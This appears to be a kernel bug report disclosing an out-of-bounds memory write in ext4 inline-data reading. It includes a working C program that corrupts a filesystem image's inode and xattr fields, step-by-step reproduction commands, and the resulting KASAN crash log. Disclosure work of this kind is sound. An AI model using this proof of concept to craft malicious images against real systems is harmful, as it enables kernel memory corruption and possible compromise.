ext4 can store data for small regular files as "inline data", meaning that the
data is stored inside the corresponding inode instead of in separate blocks.
Inline data is stored in two places: The first 60 bytes go in the i_block field
in the inode (which normally contains a list of blocks instead), the rest goes
in the special filesystem-internal extended attribute "system.data".
Since commit e50e5129f384 ("ext4: xattr-in-inode support", in v4.13+), ext4 can
store extended attribute values not only inline in the inode, but can also store
such values in dedicated inodes.
When a corrupted filesystem stores the system.data extended attribute value in a
dedicated inode, the kernel gets confused, causing memory corruption.
ext4_find_inline_data_nolock() attempts to locate an inode's inline data by
searching for the system.data xattr using ext4_xattr_ibody_find().
If the inode has xattrs, ext4_xattr_ibody_find() first checks them for
corruption using xattr_check_inode(), then grabs the wanted xattr using
xattr_find_entry().
xattr_check_inode() uses ext4_xattr_check_entries() to check the individual
xattrs, but skips most checks if `entry->e_value_inum != 0` (marking an xattr
whose value is in a dedicated inode): the length and offset checks that ensure
that the value actually fits into the inode are only performed for inline values.
The problem is that ext4_find_inline_data_nolock() then assumes that the
returned xattr uses inline storage and that the returned length will fit into
the inode; it stores the length field from the xattr in
`EXT4_I(inode)->i_inline_size` without further checks.
Later, when the file is read, ext4_read_inline_data() trusts this length value,
causing an out-of-bounds memcpy() in the following line:
    memcpy(buffer,
           (void *)IFIRST(header) + le16_to_cpu(entry->e_value_offs), len);
To reproduce, on a system with kernel v4.13 or newer, ideally with KASAN on:
1. Create a new ext4 filesystem image, with 256-byte inodes and inline data
support:
$ mkfs.ext4 -b 4096 -I 256 -O inline_data testfs.img 400k
mke2fs 1.43.7 (16-Oct-2017)
Creating regular file testfs.img
Filesystem too small for a journal
Creating filesystem with 100 4k blocks and 64 inodes
Allocating group tables: done
Writing inode tables: done
Writing superblocks and filesystem accounting information: done
2. Create a 75-byte file in the new filesystem:
$ mkdir mount
$ sudo mount testfs.img mount
$ sudo dd bs=75 count=1 if=/dev/zero of=mount/testfile
1+0 records in
1+0 records out
75 bytes copied, 0.000811554 s, 92.4 kB/s
$ sudo umount mount
3. Bump up the inode size, bump up the xattr size, and mark the xattr value as
non-inline:
$ cat fixup.c
#include <stdint.h>
#include <fcntl.h>
#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <sys/stat.h>
/*
 * Stand-ins for the kernel's fixed-width type names, so that the structure
 * definitions below can be written the way they appear in the kernel headers.
 * These are plain aliases for the <stdint.h> types; the "le" in the name does
 * not cause any byte swapping here.
 */
#define __le16 uint16_t
#define __le32 uint32_t
#define __u16 uint16_t
#define __u32 uint32_t
#define __u8 uint8_t
/* some definitions from kernel headers */
#define EXT4_NDIR_BLOCKS 12
#define EXT4_IND_BLOCK EXT4_NDIR_BLOCKS
#define EXT4_DIND_BLOCK (EXT4_IND_BLOCK + 1)
#define EXT4_TIND_BLOCK (EXT4_DIND_BLOCK + 1)
/* Number of i_block[] slots: 12 + 3 = 15, i.e. 60 bytes of __le32. */
#define EXT4_N_BLOCKS (EXT4_TIND_BLOCK + 1)
/* Value expected in ext4_xattr_ibody_header.h_magic. */
#define EXT4_XATTR_MAGIC 0xEA020000
/*
 * On-disk inode layout. With these member types the fixed part up to and
 * including osd2 occupies 128 bytes, so i_extra_isize sits at offset 128.
 */
struct ext4_inode {
	__le16 i_mode;
	__le16 i_uid;
	__le32 i_size_lo;
	__le32 i_atime;
	__le32 i_ctime;
	__le32 i_mtime;
	__le32 i_dtime;
	__le16 i_gid;
	__le16 i_links_count;
	__le32 i_blocks_lo;
	__le32 i_flags;
	union {
		struct {
			__le32 l_i_version;
		} linux1;
	} osd1;
	__le32 i_block[EXT4_N_BLOCKS];
	__le32 i_generation;
	__le32 i_file_acl_lo;
	__le32 i_size_high;
	__le32 i_obso_faddr;
	union {
		struct {
			__le16 l_i_blocks_high;
			__le16 l_i_file_acl_high;
			__le16 l_i_uid_high;
			__le16 l_i_gid_high;
			__le16 l_i_checksum_lo;
			__le16 l_i_reserved;
		} linux2;
	} osd2;
	__le16 i_extra_isize;
	__le16 i_checksum_hi;
	__le32 i_ctime_extra;
	__le32 i_mtime_extra;
	__le32 i_atime_extra;
	__le32 i_crtime;
	__le32 i_crtime_extra;
	__le32 i_version_hi;
	__le32 i_projid;
};
/* Header that precedes the in-inode xattr entries. */
struct ext4_xattr_ibody_header {
	__le32 h_magic;
};
/*
 * One xattr entry: a 16-byte fixed part followed by e_name_len bytes of name.
 * The name is not NUL-terminated; its length is given by e_name_len.
 */
struct ext4_xattr_entry {
	__u8 e_name_len;
	__u8 e_name_index;
	__le16 e_value_offs;
	__le32 e_value_inum;
	__le32 e_value_size;
	__le32 e_hash;
	char e_name[];	/* flexible array member; does not add to sizeof */
};
/* Inode size of the test image (mkfs.ext4 is invoked with -I 256). */
#define INODE_SIZE 256
/*
 * Round x up to the next multiple of `round`. The mask arithmetic is only
 * correct when `round` is a power of two.
 */
#define ROUND_UP(x,round) ( ((x)+((round)-1)) & ~((round)-1) )
/*
 * Corrupt an ext4 image for the reproduction: map the image file named by
 * argv[1], scan it in INODE_SIZE steps for something that looks like the
 * 75-byte test file's inode (link count 1, i_size_lo 75), raise its size to
 * 60000 and rewrite every in-inode xattr entry so that it claims a 60000-byte
 * value stored in inode 20 (e_value_inum != 0, i.e. not inline).
 *
 * On-disk fields are read and written without byte swapping, so this
 * presumably has to run on a little-endian host.
 */
int main(int argc, char **argv) {
	/* argv[1] is dereferenced below; refuse to run without it. */
	if (argc != 2) errx(1, "usage: fixup <image>");
	char *path = argv[1];
	int fd = open(path, O_RDWR);
	if (fd == -1) err(1, "open");
	struct stat st;
	if (fstat(fd, &st)) err(1, "fstat");
	/* MAP_SHARED so that the modifications end up in the image file. */
	char *map = mmap(NULL, st.st_size, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
	if (map == MAP_FAILED) err(1, "mmap");
	for (int i=0; i<st.st_size/INODE_SIZE; i++) {
		struct ext4_inode *ino = (void*)(map + i * INODE_SIZE);
		/* Heuristic match; every INODE_SIZE-aligned slot of the image is tried. */
		if (ino->i_links_count != 1 || ino->i_size_lo != 75) continue;
		printf("found inode (idx=%d, size=%u, mode=%ho)\n",
		       i, ino->i_size_lo, ino->i_mode);
		ino->i_size_lo = 60000;
		printf("i_extra_isize = %hu\n", ino->i_extra_isize);
		/*
		 * The xattr header follows the 128-byte fixed part of the inode
		 * plus i_extra_isize bytes of extra fields.
		 */
		struct ext4_xattr_ibody_header *hdr =
			(void*)( ((char*)ino)+128+ino->i_extra_isize );
		if (hdr->h_magic != EXT4_XATTR_MAGIC) continue;
		struct ext4_xattr_entry *entry = (void*)(hdr+1);
		/* The entry list ends at an entry whose first four bytes are zero. */
		while (*(uint32_t*)entry != 0) {
			/*
			 * e_name is not NUL-terminated: bound the output with a
			 * precision (%.*s) rather than a minimum width (%*s).
			 */
			printf("attr: idx=%hhu name='%.*s' offs=%hu inum=%u size=%u\n",
			       entry->e_name_index, entry->e_name_len, entry->e_name,
			       entry->e_value_offs, entry->e_value_inum, entry->e_value_size);
			entry->e_value_offs = 0;
			entry->e_value_inum = 20;
			entry->e_value_size = 60000;
			/* Next entry: fixed part plus the name padded to 4 bytes. */
			entry = (void*)(
				(char*)entry + sizeof(*entry) + ROUND_UP(entry->e_name_len, 4)
			);
		}
	}
}
$ gcc -o fixup fixup.c -Wall
$ ./fixup testfs.img
found inode (idx=555, size=75, mode=100644)
i_extra_isize = 32
attr: idx=7 name='data' offs=76 inum=0 size=15
4. Use fsck to fix up the inode checksum (but don't let it fix anything else!):
$ fsck.ext4 -f testfs.img
e2fsck 1.43.7 (16-Oct-2017)
Pass 1: Checking inodes, blocks, and sizes
Inode 12 has INLINE_DATA_FL flag but extended attribute not found.  Truncate<y>? no
Extended attribute in inode 12 has a value size (60000) which is invalid
Clear<y>? no
Inode 12 passes checks, but checksum does not match inode.  Fix<y>? yes
Pass 2: Checking directory structure
Pass 3: Checking directory connectivity
Pass 4: Checking reference counts
Pass 5: Checking group summary information
testfs.img: ***** FILE SYSTEM WAS MODIFIED *****
testfs.img: ********** WARNING: Filesystem still has errors **********
testfs.img: 12/64 files (0.0% non-contiguous), 13/100 blocks
5. Mount the filesystem again:
$ sudo mount testfs.img mount
6. Read the file:
$ hexdump -C mount/testfile
00000000  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00000030  00 00 00 00 00 00 00 00  00 00 00 00 04 07 00 00  |................|
00000040  14 00 00 00 60 ea 00 00  00 00 00 00 64 61 74 61  |....`.......data|
00000050  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
000004a0  31 00 00 00 00 00 00 00  e0 d1 fc 98 d7 7f 00 00  |1...............|
000004b0  e0 07 03 99 d7 7f 00 00  00 00 00 00 00 00 00 00  |................|
000004c0  00 00 00 00 00 00 00 00  e0 5f 00 00 00 00 00 00  |........._......|
000004d0  64 00 00 00 00 00 00 00  f0 af 02 99 d7 7f 00 00  |d...............|
000004e0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
[...]
7. Check dmesg:
$ dmesg
[...]
[ 3211.552729] ==================================================================
[ 3211.552782] BUG: KASAN: use-after-free in ext4_read_inline_data+0x114/0x120 [ext4]
[ 3211.552787] Write of size 59940 at addr ffff8802ba1d003c by task pool/12922
[ 3211.552796] CPU: 3 PID: 12922 Comm: pool Not tainted 4.17.0-rc4+ #7
[ 3211.552798] Hardware name: LENOVO 20FCS12V06/20FCS12V06, BIOS N1FET43W (1.17 ) 08/02/2016
[ 3211.552799] Call Trace:
[ 3211.552807]  dump_stack+0x71/0xab
[ 3211.552813]  print_address_description+0x6a/0x250
[ 3211.552817]  kasan_report+0x258/0x380
[ 3211.552863]  ? ext4_read_inline_data+0x114/0x120 [ext4]
[ 3211.552867]  memcpy+0x34/0x50
[ 3211.552914]  ext4_read_inline_data+0x114/0x120 [ext4]
[ 3211.552961]  ext4_read_inline_page+0x1e4/0x2a0 [ext4]
[ 3211.553006]  ? ext4_read_inline_data+0x120/0x120 [ext4]
[ 3211.553053]  ext4_readpage_inline+0x13e/0x160 [ext4]
[ 3211.553101]  ext4_readpage+0xf5/0x110 [ext4]
[ 3211.553106]  generic_file_read_iter+0x9a4/0xea0
[ 3211.553112]  ? filemap_range_has_page+0x160/0x160
[ 3211.553116]  ? save_stack+0x89/0xb0
[ 3211.553120]  ? __kasan_slab_free+0x105/0x150
[ 3211.553124]  ? aa_path_link+0x1f0/0x1f0
[ 3211.553128]  ? do_syscall_64+0x150/0x160
[ 3211.553132]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 3211.553137]  ? audit_watch_compare+0x1b/0x50
[ 3211.553142]  __vfs_read+0x239/0x340
[ 3211.553145]  ? __x64_sys_copy_file_range+0x2d0/0x2d0
[ 3211.553149]  ? dput.part.19+0x2e/0x1b0
[ 3211.553154]  ? auditd_test_task+0x43/0x60
[ 3211.553158]  vfs_read+0xa5/0x190
[ 3211.553162]  ksys_read+0xa1/0x120
[ 3211.553166]  ? kernel_write+0xa0/0xa0
[ 3211.553171]  do_syscall_64+0x6d/0x160
[ 3211.553175]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 3211.553178] RIP: 0033:0x7f9ada1af72c
[ 3211.553180] RSP: 002b:00007f9ac2258888 EFLAGS: 00000246 ORIG_RAX: 0000000000000000
[...]
[ 3211.553197] The buggy address belongs to the page:
[ 3211.553202] page:ffffea000ae87400 count:2 mapcount:0 mapping:ffff88021fe57898 index:0x0
[ 3211.553207] flags: 0x17fffc000000021(locked|lru)
[ 3211.553213] raw: 017fffc000000021 ffff88021fe57898 0000000000000000 00000002ffffffff
[ 3211.553219] raw: ffffea000858fc20 ffff8803d0a204a0 0000000000000000 ffff8803cf31cac0
[ 3211.553222] page dumped because: kasan: bad access detected
[ 3211.553224] page->mem_cgroup:ffff8803cf31cac0
[ 3211.553229] Memory state around the buggy address:
[ 3211.553234]  ffff8802ba1d0f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[ 3211.553238]  ffff8802ba1d0f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[ 3211.553243] >ffff8802ba1d1000: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
[ 3211.553246]                    ^
[ 3211.553250]  ffff8802ba1d1080: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
[ 3211.553254]  ffff8802ba1d1100: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
[ 3211.553257] ==================================================================